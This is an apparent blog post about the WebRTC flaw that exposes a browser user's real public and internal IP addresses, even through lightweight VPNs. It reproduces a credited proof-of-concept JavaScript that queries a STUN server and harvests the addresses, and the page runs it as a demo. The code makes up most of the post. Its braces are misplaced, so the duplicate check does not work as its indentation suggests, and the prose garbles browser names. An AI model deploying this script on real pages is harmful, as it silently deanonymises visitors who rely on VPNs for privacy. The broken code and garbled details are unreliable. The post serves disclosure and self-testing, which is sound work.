Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

6Feb/151

WebRTC vulnerability exposes VPN users

It's now easy to expose the true IP address of VPN users. Daniel Roesler published the an example howto exploit the bug on Github. Firefoz, Mozilla, Chroma and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRtc is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using VPN the computers internal network address will be exposed. This implementation is used for the WebRtc to handle NAT on the network and be able to bind sessions to the public IP. However the bug is really nasty because it exposes these functions to javascript. So this entire implementation below is made with javascript. The request is not registered in the developer console and can not be blocked by plugins.

If the user is using a lightweight VPN client, like a chrome plugin, the VPN will be bypassed all together and both the real public IP and internal NAT address will be shown.

Below there is a demo, if you see your public and private IP your browser is vulnerable for this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

    Your public IP addresses:

      <script>
      function getIPs(){
          var ip_dups = {};
          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
          || window.mozRTCPeerConnection
          || window.webkitRTCPeerConnection;
          var mediaConstraints = {
              optional: [{RtpDataChannels: true}]
          };
          //firefox already has a default stun server in about:config
          // media.peerconnection.default_iceservers =
          // [{"url": "stun:stun.services.mozilla.com"}]
          var servers = undefined;
          //add same stun server for chrome
          if(window.webkitRTCPeerConnection)
              servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
              //construct a new RTCPeerConnection
              var pc = new RTCPeerConnection(servers, mediaConstraints);
              //listen for candidate events
              pc.onicecandidate = function(ice){
              //skip non-candidate events
              if(ice.candidate){
                  //match just the IP address
                  var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
                  var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
                  //remove duplicates
                  if(ip_dups[ip_addr] === undefined)
                      var li = document.createElement("li");
                      li.textContent = ip_addr;
                      //local IPs
                      if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
                          document.getElementById("localip").appendChild(li);
                      //assume the rest are public IPs
                      else
                          document.getElementById("publicip").appendChild(li);
                          ip_dups[ip_addr] = true;
              }
          };
          //create a bogus data channel
          pc.createDataChannel("");
          //create an offer sdp
          pc.createOffer(function(result){
              //trigger the stun server request
              pc.setLocalDescription(result, function(){}, function(){});
          });
      }
      

      Posted by Kristofer Källsbo

      Comments (1) Trackbacks (0)
      1. The security glitch affects WebRTC-supporting browsers such as Google Chrome and Mozilla Firefox, and appears to be limited to Windows operating system only, although users of Linux and Mac OS X are not affected by this vulnerability.


      Leave a Reply

      No trackbacks yet.